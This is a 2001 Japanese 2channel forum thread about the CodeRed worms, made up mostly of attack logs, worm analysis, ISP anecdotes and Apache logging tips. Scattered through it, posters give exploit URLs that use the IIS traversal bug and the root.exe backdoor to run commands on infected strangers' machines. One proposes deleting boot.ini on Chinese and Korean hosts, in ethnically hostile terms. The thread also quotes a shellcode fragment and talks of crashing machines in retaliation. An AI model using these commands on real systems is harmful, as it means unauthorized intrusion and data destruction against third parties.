それはノートンのイヤガラセだよ。

よかったらＰａｓｓゆずってくれでち・・

当然プロバイダの方へもCodeRedは行っているだろうから、せめて自分の会員の
感染くらいは教えてやれぱいいのにな。
いまだに最低１分に一発はやって来るよ。

>>567
encは、侵入者のデータを記録してるファイル。
CodeRedのコードも記録されてるから、それに反応したんでそ。

>>571さん
有難う〜。
ＭＥなのに何でなんだろうと思ってたから
(もしかしてこれも新種っ)て不安でした。
少し安心出来ました。

>>569
メールでＰａｓｓ送りました。

こうやって一人一人警告していくしかないわい。

http://IP/scripts/..%c0%af../winnt/system32/cmd.exe?/c+net+send+localhost+"あひょ〜！このマシンはCodeRed2に感染しています"
http://IP/scripts/root.exe?/c+net+send+localhost+"あひょ〜！このマシンはCodeRed2に感染しています"

ルーターのポート塞いで安心して、感染したままでいる人間もいるけど、これはISPに
警告してもらおう。

ちなみに中韓の連中相手にはもうこれだな。
http://IP/scripts/root.exe?/c+del+/a:S+c:\boot.ini

うちのApacheは以下のように設定した。

Redirect /default.ida http://a102.ms.a.microsoft.com/f/102/1611/2h/download.microsoft.com/download/vstudio60ent/sp5/Full/WIN98Me/JA/vs6sp51.exe

少しは役に立つだろうか。

>>573
ありがとう、ありがたく頂戴いたします。

うまく出るかな

>>576

（・∀・）ｶｺｲｲ!!

>>575
意味なし。

>>578
CodeRed感染サーバの動作が巨大ファイルのダウンロードで遅くなる程度の副作用とか・・・

こんなのをダミーの鯖に設置しようと思うんですが、ダメでしょうか。
↓

<default.ida>

#!/usr/bin/perl
print "Content-type: text/plain\r\n\r\n";

for(;;){
print "A";
}

>>580
うーん、自分の回線の帯域を使うのはもったいない

>>579
帯域が使われると遅くなるので、、相手の管理者も気づくんではないかと。
妙に遅いとか、何もしてないのにアクセスランプがついている、とかで。

>>580
相手はどうなるんですか？

>>583
延々と「AAAAAAAAAAA…」を受け取り続けるという事に…

>>579,582
根本的に勘違いしていると思われ。

>>585
カキコ直後に気がついたよ(恥 相手はブラウザじゃないし、レスポンスも受信
しないだろうしね。

やってみました。(ｺﾗ
んー、なんかイマイチって言いますか。。
そのあと2回もおなじＩＰからアクセスあったようなんですよね。
やっぱり、意味無いんですかね、、

>>585
受信しないのかな？
するとオーバーフローで穴開けたあと、どういう手順で感染させるんだろう？

何かこう、ええ方法はないんですかなあ

>>580
それは実際に某社で使用されたクラッシャーじゃないですか。

台湾からのコードレッドアクセスが多いのは
気のせいだろうか

うちでは韓国からが多いですな。あと大陸。

>>588
オーバーフローした段階で、すでに感染してます。

>>587
１．中国語の場合は、自己流布のためのスレッドを600個作成し、これがそれぞれ48時間、自己流布のために攻撃パケットを送信しつづける。中国語以外の場合は、自己流布のためのスレッドを300個作成し、これがそれぞれ24時間、自己流布のために攻撃パケットを送信しつづける

２．生成したIPアドレスへの攻撃に当たっては、非ブロッキングモードで接続を試みる。この場合、接続の完了を待たずに次の攻撃に移れるため、結果として、攻撃頻度が高くなる。

３．この攻撃によって他ホストへの接続に成功すると、自身のコピーを送りつける。現時点では自己改変機能はないため、Code Red IIはすべて同じ内容である。なお、このコピーは約3.5KBある。

という事なので、次々と同IPからアタックして来たとしても不思議ではないです。
３番目の処理をどのようにして判定しているのかがわかれば何か手が見つかるかも
知れないですが。

9/1　ADSLを導入してルーターモデムTE4100に変えてから　CodeRedが全くこなくなった。不思議だ。
TE4100が阻止しているとは思えない。

>>593
オーバーフローさせたあと、約3.5Kbの自分のコピーをを送りつけて実行させ、
感染を完了するみたいなんですが。

http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html

>>595
以前とはIPが変わってはないですか？
第一オクテットが61, 201, 210, 211に被害が集中しているそうですが。

>>596
ちがう。コピーを送りつけるのは、さらに次の犠牲者への感染。

>>598
重要なのはXの羅列の後ろに続くバイナリ部分ですが、これによって穴を開け、続いて
本体を流し込むのでは？
以下だけで完結するとは思えないんですが。

%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

>>596
舌足らずなので補足(もう食傷って方、すんません）
自分のバッファあふれ＝先の感染者から3.5kbのコピーをつっこまれることってこと。

いまさらながら、かのアレフワンによるバッファフローの解説の和訳。
http://linux.ascii24.com/linux/linuxcom/2000/06/13/465216-000.html
2ページ構成になっていて、2ページ目が詳しい。

>>599
600読んでもらったら判ると思うけど、
結局、本体を流し込まれたら、バッファを処理していた(正式の)関数の処理が終わり、
呼び出し元の関数に戻ろうとする時点で流し込まれたコードに誘導され、乗っ取られるの。
＃CodeRedが特殊ではなくて「バッファオーバフローによる制御奪取」の定義ともいえる。
ちょっと説明の要領がわるくてスマソ。

>>601
読んできました。オーバーフローの要領はわかりましたが、そうするとCodeRedは
最初のアタックのリクエストの中に本体を詰め込んでいるわけですか。
そうすると、いよいよはた迷惑な…

>>599
>以下だけで完結するとは思えないんですが。
「URLだけじゃ3.5Kbないぞゴラあ」という疑問について。
POSTデータの中にウイルス本体があって、URLのあふれ部分は、そこにジャンプする
ように仕掛けをする最低限の部分しか入ってます。
なにげに、www.eeye.comの中にディスアセンブルリストが公開されてます。

かなり昔(いつだけっけか)に既出ですが、ここに詳細レポートとディスアセが。
http://www.eeye.com/html/Research/Advisories/AL20010804.html

>>603
なるほど、本体ごとやって来るものでしたか。よく考えているというかはた迷惑極まる
というか…。
ご指摘のリストを探してみます。

>>597
61からしかこねー｡

>>604
あ、すいません。助かります。

>>606
そりゃ、あなたの現在のIPが61だからでは？

>>585
ディスアセでウラをとってみた。
ちゃんと相手に届いてるかどうか、send()の返り値の確認 & recv(1バイトだけ)を
行って即close()してました。
すぐにcloseすると、ちゃんとインデックスサーバのコードが起動されないから、
受信完了も待つのではとかすかに期待したが、そんなことはなかった(w
やはり大量データを応答してCodeRedIIを困らせるという作戦はやっぱり没。

>>609
seg000:00000366のあたりでちゃんと考えてありますねぇ…。
何か良い方法は無いものか…。

>>597
ADSLのIPは、61.*.*.*　で以前とは変わっていません。

>>611
ですか。そうするとなんでだろ。私の所にはもう連日大入り満員です。
パチンコ屋だったらありがたいですがCodeRed2では。

>>612
FLETS　ISDNのときは　切断で　61　211といろいろ　IPが変わりました。
そのときは、どのIPでも　いっぱいきましたが　今ADSLでは全くきません。
ちなみに　プロパは、ODNです。　

２ｃｈを睥睨して寄りつかなかったリアルハッカ−兼有能なＳＥさん方
も、知識欲を刺激するこのスレのお陰で書き込んでいるもよう。
(･∀･)ｲｲ!!

>>613
もちろんルーターは静的NATやDMZの設定になっているわけですよね？
不思議ですな。
うちは現在のところ211ですが、ガンガン来ています。
他の61の方はどうなんでしょう

W2KのMSのCR対策パッチ当てると、RealPlay起動でマシンが
リセットされる。

index service止めたら直ったヨ。

Duron750 見れのG450

2001/07/17 07:27 80,282 geroshabu43.zip
2001/07/18 22:30 12,255 kankiri100.zip
2001/07/16 21:56 313,582 Longi018.lzh
2001/03/29 22:29 26,624 Longinus.dll
2001/05/24 10:44 599,040 Longinus.exe
2001/08/03 07:28 431 Longinus.ini
2001/05/24 10:50 3,794 Longinus.txt
2001/08/12 20:14 <DIR> sakura0f2
2001/08/12 20:14 <DIR> siri&crack
2001/08/12 20:14 <DIR> HamaEvolution
2001/08/12 20:14 <DIR> iria107a

こういうファイル名がc:\にズラズラ並んでいる人でも、CodeRed2の餌食になってい
ますな。net sendで警告しておきました。

>>615
ええ　ルーターの内側にWEBサーバーがあり　PORT８０で外から参照できます。
全く　不思議です。

他の方で　住友のTE4000/4100を使っている方は、いないのでしょうか？

以下　ルーターのFWバージョンです。
MegaBit Gear TE4000 Ethernet Modem, G.lite, Annex C
Hardware Revision: 0001
Software Version: 01.22 (Mon Apr 2 15:59:21 JST 2001)
Boot ROM Version: 01.22 (Mon Apr 2 16:00:38 JST 2001)
DSP Firmware Version: 7.31
MAC Address: 00:00:**:**:**:**

http://slashdot.jp/comments.pl?sid=01/08/05/0441253&cid=126
これ使ったヤツは居ないのか？
レポート求む。

>>618
うちも61.xxx系ですが、9/1にぱたっと来なくなりました。
9/1の到着数の累計は０です。
9/2の午後からは、また来始めましたが。今も来てます。
同じくTE4000を使ってます。

明日のNHKニュース10
CodeRed特集らしい。
どうせ内容は期待できないけどね。

あしたNHK ニュース10でコードレッドの特集をやるらしい。
既出かな。

>>622
ｹｺｰﾝしてしまった（ｗ

かぶった。一歩おそかった。

>>620
試しに　一度切断して　IPを変えたところやって来ました。
以前と変わらないペースで（W
IP変更後も61.*.*.*は、変わらないので　RedのアルゴリズムではIPアドレスを
総なめにするわけではないようですね。

[04/Sep/2001:04:52:13 +0900] pasocon.nsc1.co.jp　晒し

今日接続し直したら211から61へIPが変化しました。
が、相変わらず猛烈なCodeRed2の嵐が吹き荒れております。
ひょっとして治まるかと思い、ちょっと期待していたのですが。

>>625
するとCodeRedのアルゴリズムで生成されないIPにうまく当たった時、攻撃の網から
漏れるという事になりますか。

>>619
MicrosoftのHPへリダイレクトさせてnet sendを送るというプログラムですが、まず
リダイレクト自体を受けつけるかどうか。
net sendの方はこのままでは失敗する確率も高いかと思います。
scripts/root.exe
よりも
scripts/..%c0%af../winnt/system32/cmd.exe
の方が通る率が高いようです。
私は日本のIPから来た時だけ手動でやっていますが、効果はありますよ。
警告を入れると大抵ネットから切断されます。
英語、日本語で同じ文面の警告を一回づつ送信するようにすれば完璧ですかな。

約１月、このような調子が続いています。これもCODEREDでしょうか。
ZAQに問い合わせても埒が開かきません。
厨房にできる対策があればご教示下さい。

Alert 01/09/04 12:40:29 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.239.86.43,http
Alert 01/09/04 12:40:23 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.239.86.43,http
Alert 01/09/04 12:40:20 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.239.86.43,http
Alert 01/09/04 12:37:36 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.181.246.98,http
Alert 01/09/04 12:37:30 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.181.246.98,http
Alert 01/09/04 12:37:27 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.181.246.98,http
Alert 01/09/04 12:36:27 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.135.12.65,http
Alert 01/09/04 12:36:21 NDIS Filter 未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 211.135.12.65,http

>>628
恐らくCodeRedでしょう。きちんとブロックされていますので何ら大過は無いと思います。
これはもうZAQに問い合わせても対処のしようがありません。
もしもルーターかFWのフィルタ設定が可能でしたら、Port80をリジェクトするように設定
されれば、この実に頻発する警告から解放されます。


ところでうちで現在、>>619さんの指摘されたカウンタープログラムをPHPで組んで動か
しておりますが、効果があるのか無いのかサッパリ不明です。

>>629
有難うございます。少し安心できました。
警告うざいのでルーター導入を考えてみようかと考えています。

>>630
そういう警告が出るところを見ると、何かFWソフトが入っているでしょうから、明示的に
Port80を遮断する設定にすればOKですよ。


スクリプトをしかけて以降、１時間に２アタックに激減しとります。効果があるんでしょ
うか。

>>631
ノートンを入れています。Port80は、IGMPプロトコルを遮断すると
なっていました。ブロックされているということですのでやはり
警告は放置しておくことにします。ご親切にどうもです。


関係ありませんがこの板変ですね。

>>632
書き込まなければ更新されないとか？
リロードしても。

それなら
http://www6.ocn.ne.jp/~mirv/bbstable.html
から入るとヨロシ。
原因は板のURLが変更になったから。

このことじゃなかったらｽﾏｿ

今夜、NHK ニュース10でコードレッドの特集やるらしいけど、
　えーん氏は出演するのかな？？

えーんage

| 　　。
|⌒ヾ
|冫、）
|` ／ ジー
| /
|/
|

ＮＨＫage

ニュースのさわりにちょっとやってたね＞ニュース１０

はじまったね。

苦情があいついだISPってどこよ？

眠そうな三沢見たいな顔だ。社長

コードレッドって、ウィルスだったんですね＞ＮＨＫ
ワームだと思ってたよ。

葬手苦だ...

>>640
東京メタかなかインターリンクかな
気になったのだが、え〜ん氏＝平○氏？

ｵﾜﾀ

連続書き込み失礼。
くだらない突っ込みなのでsageで。

ウィルスウィルスって・・・ワームだと思うのだが。

「技術の進歩に伴って、codeなウィルスが・・・」って、掛けてあるのかな？(藁

でも、思ったより短かったな。もっとやるべきだと思うのだが。

CodeRedってワームでしょ。NHKが無知なのか
認知しやすい言葉で置き換えたのか･･･。

この影響受けた会社ってめた○っくのこと？通信障害起こしてたのはめた○っく以外知らない。

番組中で「コードレッドバスター」って言ってたような。（ｗ
なのでインターリンクかな。

>>644
コードレッドバスター(w

CodeRedとIIがゴッチャになってたな。
まぁ取り上げただけマシということでしょう、きっと。

つーか、ある意味ではセキュリティーホール突くわけだからワームか？

>>644
インターリンクのことだと思う。
おれは顔出しＮＧ

>>647
ほぼこういうこと。

普通のウイルスに比べて地味でしょ。
ニュース性に乏しいってイテタヨ

>>652
そですかー。
そりゃ総鉄屑つかってるわけないもんな（ｗ

>>653 だからウイルスに感染しても気付かない奴が多い。
ITとか言ってる前にそこから何とかしてくれ。

おれが念を押したのは、「初期の９月で終わると、いうことが無くなった。」と
「ダイヤルＵＰでも感染者がかなりいる。」この二つ。

某放送局はこの板見てたよ。
途中からおれが書き込まなかったのはその為。

CATV内部では感染者数が徐々にピーク時に戻りつつあり。
鬱だ・・。

おれは、プロバの人間だが、 CodeRedによるアクセスの苦情を受けて、該当する感染者に連絡するのだが、「対応拒否」する馬鹿がたまにいて困ってるよ。

一番の被害者は自分自身だってのが解らねえのかな？
MSもこんなやつに2000なんぞ使わせるなよ。

>>659 その警告ってメールで警告するの？それとも電話？
会社名とかは出さなくていいから教えて欲しいんだけど。
警告無視するやつはデータ消えたのプロバのせいにすると思われ。

対応拒否って何で？
そいつらは「自分がCode redに感染している」及び
「回りを攻撃している」事実は認識してるの？対応拒否？馬鹿？
逆にそういうやつを野放しにしてたらプロバの信頼に関わると思われ。
まぁプロバ側はしょうがないんだろうけど･･･なんだかなぁ。

ＩＩＳのセキュリティ問題が出るたび
ＭＳの責任問題にならないのが毎回不思議なのですが・・・

X-B○X遅れもバグのせい？

対応拒否の考えられるパターン（予想）
１）開き直り
他のところも感染してるから、ウチだけ対応したくない。
他が全部対応したらウチも対応してやる。

感染して困る所は自分で対応すればいいだろう、ウチは感染しても困らないから対応しないぞ！
どうしても対応して貰いたかったら、金出せ！

２）とぼける
はぁ〜、なんですか「それ」
法律や規則で対応するって決まっているんですか？
えっそういう訳ではないの？　じゃ面倒だからしません。

IPを逆引きすると不思議なドメイン名称がやってくる、よく分からん。

[04/Sep/2001:23:04:34 +0900] web - - "GET /default.ida?
[04/Sep/2001:23:08:32 +0900] bymain - -
[04/Sep/2001:23:21:20 +0900] yl-hncmptg0852b - -
[04/Sep/2001:23:40:36 +0900] jhkim - -
[04/Sep/2001:23:41:43 +0900] bsy - -
[04/Sep/2001:23:48:09 +0900] milibo - -
[05/Sep/2001:00:00:12 +0900] king104 - -
[05/Sep/2001:00:14:41 +0900] wang2 - -
[05/Sep/2001:00:15:08 +0900] nib - -
[05/Sep/2001:00:26:15 +0900] soo - -

>>659
そりゃ本当ですか？
困ったなあ。

>>664
それじゃ、結局ホールを突いてシステムをクラッシュしてやるしかないという事になり
ますか。
でも、当人のデスクトップやマイドキュメントに保存しているファイルや、メールの中身
すら読めてしまうというのに、それでも対応拒否なんですかな。

>>665
ログを逆引きさせずに保存してみては？

対応拒否っていうよりも、対応法説明されても、ちんぷんかんぷんで
「できない」って答える人も多そう。
「そこまでいうなら来て直してくれ」とかいわれませんでした？
個人でWin2000の人ならそいつの責任だけど、
小さな会社でサーバ立てた人間が辞めると分かる人が
誰もいなくなるという例は結構ある。
この場合本当に「できない」んですよね。
ネットに繋ぐなとは言えないし・・・。

鯖立てる責任みたいなのはあると思うんだけどなぁ･･･

>668
でもFrontPageExpress入れると本人の意思と無関係にIISがEnable
になるとかって話なかったっけ?

うちは、LINU＆アパッチなんで、今回は関係ないですが、
いちおう上司に危険性の事を話したら、
『プロバイダを通してるのに、そんな危険なもんが来るのか！？』
とか言われた・・┐(;´Д｀)┌

うちはりなっくすだから感染しないですっていったら、
少し誇らしげな表情をしていた(;ＴДＴ)

なんとなく、
上司「メモリを増やしたんだ、すごいだろう」
部下「どのくらい増やしたんですか？」
上司「２枚だ」
というジョークを思い出してしまった。

某CATVネットでは警告メールがでてます。
感染したまま放置した場合、利用を停止することがあるとか。
警告を無視した場合は加入契約の継続を断るとまで書いてました。

有料サポートの案内も一緒に書いてあったけど（ｗ

>>673
それぐらいの対応で普通じゃないのかな。
とりあえず切断しちまえよ。

そういう強硬手段を採らざるを得ないという事は、やはり警告を無視する人、
放置したままの人が多いという事ですか？

root.exe叩いてくるバカがいます。たすけてください・・・

何気に思うんだけど、新規でIIS走らす鯖機導入して
立ち上げ直後に新規感染してたら、、全然減らないぞ(#ﾟДﾟ)
マイ糞、もちっと水際で防ぐ努力しろ。

コードレッドってある日になったら、サーバ落とすんだっけ？
サーカムと混乱している可能性あり。

>>678
ホワイトハウスの事か？

>>677
いきなりグローバルの海に晒したままインストールしちゃダメ！
初歩の初歩だべさ。

>>680
いや、っていうか、新規導入って事はそれすら知らないユーザーって事も有
りうるわけで。。。

>>677
同意
>>680のいう事は正論だけど、実際にそれをしない奴らが山ほどいるよ！
この前（８月はじめ）も、不安定になったサーバーの相談を受けたので、CodeRedの感染の可能性を示唆したら・・・
「それは無いと思います、何度も再インストールしてちゃんとパッチも当てました！」と逆ギレされそうになった。
でもね、ネットに接続したまま再インストールしたんだって。
※確かに環境によっては、切った状態でインストールするのは面倒な時もあるしな・・
　手間が増えた分の費用の総額って凄くないか！

>>682
せめてFirewallの設定を変更してグローバルからの接続を
総蹴りにしてからやって欲しいな

http://cnet.sphere.ne.jp/News/Infostand/Item/2001-0906-J-2.html
いやん。

>>682
そういえば確かに「ちゃんとやった！」、「間違いなく指示通りにやった！」というクライアントの
主張が正しかった事は一度もないです。

対CodeRedワームCodeGreen期待あげ

とりあえず、最近の状況連絡っす。＠CODERED　WATCHER　あげ
いまだ、衰えず　こーどれっどちゃん
[2001/09/03 22:18:24] CodeRed Type XXXXX from: 210.150.114.xxx / c114192.ap.plala.or.jp
[2001/09/03 22:44:50] CodeRed Type XXXXX from: 202.107.80.xx /
[2001/09/03 23:09:10] CodeRed Type XXXXX from: 202.123.198.xxx /
[2001/09/03 23:42:41] CodeRed Type XXXXX from: 202.207.210.x /
[2001/09/04 1:42:03] CodeRed Type XXXXX from: 202.98.84.xxx /
[2001/09/04 1:55:17] CodeRed Type XXXXX from: 202.99.60.xxx /
[2001/09/04 1:56:32] CodeRed Type XXXXX from: 202.109.139.xx /
[2001/09/04 2:50:03] CodeRed Type XXXXX from: 202.39.13.xxx /
[2001/09/04 3:27:50] CodeRed Type XXXXX from: 202.197.107.x /
[2001/09/04 3:30:55] CodeRed Type XXXXX from: 202.125.86.xxx /
[2001/09/04 4:15:23] CodeRed Type XXXXX from: 202.107.35.xx/
[2001/09/04 5:45:08] CodeRed Type XXXXX from: 202.130.13.xxx /
[2001/09/04 7:04:02] CodeRed Type XXXXX from: 202.119.46.xx / astronomy.nju.edu.cn
[2001/09/04 7:17:09] CodeRed Type XXXXX from: 202.43.87.xxx /
[2001/09/04 7:40:08] CodeRed Type XXXXX from: 202.21.4.xx /
[2001/09/04 7:43:44] CodeRed Type XXXXX from: 24.38.194.xxx / cc927782-c.etntwn1.nj.home.com

>>687
なんで感染ホスト伏せ字にするの？

晒すのが目的じゃないからじゃない？

そういう意味じゃなくって晒すと法的に問題あるの？
ただの、感染者のプライバシーに対する配慮だけ？

でもリモホの方は伏せてないから一部バレバレだと思うのは漏れだけ？

http://headlines.yahoo.co.jp/hl?a=20010907-00050632-reu-int
中国で新たなウイルス「コード・ブルー」が出現
　［北京　７日　ロイター］　世界中で大きなの被害をもたらしたワーム型コンピュータウイルス「コード・レッド」に類似したウイルス「コード・ブルー」が、中国で出現した。
　中国のコンピューターのセキュリティ専門家は、既にウイルスの分析にかかっているという。
　コード・ブルーの被害規模については明らかになっていない。
　新華社によると、コード・ブルーは徐々にコンピューターに感染していき、結果的にシステムが破壊される。
　（ロイター）
[9月7日19時18分更新]

これって・・・。

>>692
ガイシュツの変種に勝手な名前付けて騒いでる可能性大。

>692
コード・グリーンは？？

・・どうでも良いけどいつの間にID表示無くなったん？

http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=22381
↑記事有った。。コード・グリーン

なんかおれのPCがCode Red�Vに感染したとメッセージでた。
�Vって聞いたことないが・・・。だれかわかる？

こうなったら日本はコードイエローで応戦しる！

>>697 IISワーム戦隊コードファイブってか？(ﾜﾗ

>696
CodeRedIIにしっかりやられてBackDoorできてるんでないの？親切な人が教えて
くれたんだろ。ちょっと恥ずいかもしれんぞ。

>>699
笑ってシマタ

コードイエローの好物はやっぱカレーなんすか？

個人的にはピンクがいいと思われ。

第十六話「偽グリーンに気を付けろ！」の巻

コードスケルトン希望

Redirect /default.ida http://www.broccoli.co.jp/

>>705
頭わるい

>>695
CodeGreenが来るとどんなアクセスログが残るんでしょう?
GGGGGGGGGGGGGGGGGGGGGGGGGGGG なんすかね?
自宅鯖のログには今のところ変った感じはないのだが...

アンチCode Red、Code Greenあげ。

http://www.zdnet.co.jp/broadband/0109/07/codegreen.html

ただし、Code Greenには時限消滅機能がついていないらしく、ある意味Code Redよりたちが悪いかも。

>>709
Greenが全部にパッチ当て終われば自然消滅するだろう。

>>708
この情報張ってくれてサンキュ
サイトに入れます。

>>708
>侵入したCode Greenは，MSサイトからパッ
>チをダウンロードしてあててくれる。

爆笑〜♪

SecurityFocus.com　に行ってもどこにあるんだかわからなかったよ……
メーリングリストなんだよね。

>>713
直リン張ったページの中に下記の直リン有る
www.securityfocus.com/templates/archive.pike?mid=211428&part=.1&list=82
↑コードグリーン
www.securityfocus.com/templates/archive.pike?mid=211462&part=.1&list=82
↑CRcrean
両方ともzip直リン。
コードグリーンの方は、asmのソースとバイナリが拡張子txtにして入ってる。
READMEも付いてる。#use it at your own risk!って決り文句書いてあるけど（ｗ
最初、某ウイルスサイトで見つけたのと同じだから大丈夫？でしょう。。

但し、>>708の記事にも書いてある様に、両者ともソース公開してるから
騙りの亜種登場する可能性否定できないね。。。
解ってる奴がちょっといぢくれば、、、色々でしょ。どの様に使うかは、
your own riskだし。

ownで済めばな・・・

ownで済まないのがワームの怖いところだね。。。

>>710
「CRclean」は2001年11月に消えるけど、「Code Green」はパッチが当てられていようといまいと
世界中のシステムに侵入を繰り返し、結局Code Redのようにトラフィックの低下を招くのでは？
そこが不安。

CRcleanくらいなら、どこか関係機関から犯罪にならない、もしくは
しないというお墨付きが欲しいな。。無理か。。

最低でもSP1あててないとCodeRedパッチって使えないんだよね？
SP1/SP2を入れてないノーマルW2Kなマシンを検知した時はどうするんだろう？

どっちにしてもパケット吐きまくるとなるとしばらくはウザイことにかわりはないのかな　

では、破壊した方が速いということで満場一致

今日は1つも来なかった…ある意味恐い…
みんなはどうですか？

最近の状況連絡＠CODERED　WATCHER　あげ
衰えず　こーどれっどちゃん
[2001/09/08 23:32:32] CodeRed Type XXXXX from: 61.194.132.xxx / h1321xx.ap.plala.or.jp
[2001/09/09 0:07:47] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp
[2001/09/09 0:34:55] CodeRed Type XXXXX from: 210.83.133.xxx /
[2001/09/09 0:52:24] CodeRed Type XXXXX from: 210.64.51.xxx /
[2001/09/09 1:25:48] CodeRed Type XXXXX from: 210.136.196.xx / adslstm1-pxx.hi-ho.ne.jp
[2001/09/09 1:30:57] CodeRed Type XXXXX from: 210.205.238.xx/ s210-205-238-xx.thrunet.ne.kr
[2001/09/09 1:35:29] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp
[2001/09/09 1:57:07] CodeRed Type XXXXX from: 61.194.132.xxx / h132xxx.ap.plala.or.jp
[2001/09/09 2:03:21] CodeRed Type XXXXX from: 210.136.218.xx /
[2001/09/09 2:17:43] CodeRed Type XXXXX from: 210.136.241.xxx/ tokyo3-xx.pias.ne.jp
[2001/09/09 2:31:17] CodeRed Type XXXXX from: 210.136.241.xxx / tokyo3-xx.pias.ne.jp
[2001/09/09 2:48:49] CodeRed Type XXXXX from: 210.78.138.xxx /
[2001/09/09 3:16:18] CodeRed Type XXXXX from: 210.127.33.x/ pdf4xx.dongbu.co.kr
[2001/09/09 3:21:22] CodeRed Type XXXXX from: 210.222.178.xx/
[2001/09/09 3:52:20] CodeRed Type XXXXX from: 210.98.146.xxx /

>>722
未だに１時間に１０個は来るなあ。今割り当てられてる IP は211.* 。
CodeGreenがCodeRedのペースで広がったら、数日で行き渡るよね。
……あ、今度はCodeGreenからのアクセスがバンバンくるのか。

　ウチは5分に一個のペース。IPは210.＊（殆どKrかCh、たまにJP）
　黒氷がチカチカするとウザイけど、完璧に来なくなるのもチョト
　さみしいカモ....

Code Rcleanの方がいいですかね？

CodeRed養殖したいんですけど？

NPFは正常に起動中…たまたま運がよかったのかも。
でも、あるページの表示が遅いのは明らかにコードレッドのせいだよな。

下のﾁｭﾝのサイトCodeRedを吐いてるぞ！
JAPAN SPA 芳香仕女 っていったい・・・
http://www.gomy.net/

コードグリーンが開発されたわけで

http://www.zdnet.co.jp/broadband/0109/07/codegreen.html

Code Blue発見あげ
http://www.zdnet.co.jp/news/0109/08/b_0907_06.html
具体的な事は何も分からないなあ・・。
今回もWin2000とWinNTのみに感染？

Code Blue
http://www.newsbytes.com/news/01/169891.html
に詳しい事載ってたよ。

>732
なんか、レッドと喧嘩するみたいね（ｗ

apacheのエラーログがコードレッドだらけで読めないんで、
とりあえず、エラーだけでも出ないように、
default.idaに対する要求を、当たり障りのないようにｹﾞｲﾂの会社の頁にRedirectしたんだけど、
みんな、他に被害を最小限にくいとめるための、ほんとにちょっとした対策とかって
どんなのしてらっしゃいます？

>>734
ガイシュツだと思うけど、リダイレクトはあんまり
意味無い。げいちゅに反省促すのはいいけど。

ログの振り分けは別スレにあったが。漏れはsedで
十分なんだが（ｗ

>>735
NOT Foundのエラー消すためだけのリダイレクトだったんで、
効果ないのは解ってたんですが、
だからって、知らない人のホストにリダイレクトするのも
気がひけたので(^^;;
ところで、ログの振り分けの事がかいてある別スレって
どこかおぼえてらっしゃいます？

>>736
> NOT Foundのエラー消すためだけのリダイレクトだったんで、
勘違いスマソ

> ところで、ログの振り分けの事がかいてある別スレって
> どこかおぼえてらっしゃいます？
http://cocoa.2ch.net/test/read.cgi?bbs=unix&key=985980991
UNIX板だった。「Apache関連」201,222あたり。

---- コピペ開始 ----
> とりあえず XXXX 系のログだけでも隔離しよう。
> FreeBSD の場合だと。

> SetEnvIf Request_URI default\.ida code-red
> CustomLog /usr/local/apache/logs/access_log combined env=!code-red
> CustomLog /usr/local/apache/logs/codered_log common env=code-red
---- コピペ終了 ----

>>735
さんきゅっす!!
さっそくやってみます!!

新型ワーム『コード・ブルー』が中国企業を標的に
http://headlines.yahoo.co.jp/hl?a=20010910-00000001-wir-sci

最近、ポートを塞いだCodeRed感染マシンが増えたような気がしませんか？
ひょっとしてFWかルータを使ってポートを塞ぎ、「これで安心」と思いこんでいるのでは。

>>740
何で解るの？
ひょっとして、アタックログ見るの密かな楽しみにしてない？

>>740
同じことは感じますが、
塞いでるのかもしれないし、PROXYかもしれない。

>>741
大体常連さんはわかります。穴を利用して警告を送るようなcgiをしかけているわけで
すが、警告が行くと大抵は回線を切断するようです。その後、また常連らしき人から
アタックが来るわけですが、調べてみると今度はポートへ接続できない。
しかしCodeRedからは攻撃が来る。という事は、根本的な対策は何も打たないままで
ポートを塞いでいるだけではないかと思われます。

昨日からPort80にこんな感じでYBBユーザーからアクセスが来まくっているん
ですが、これはコードレッドなのでしょうか？

Date & Time　　　　　Action　　Service　　　　　Host Name
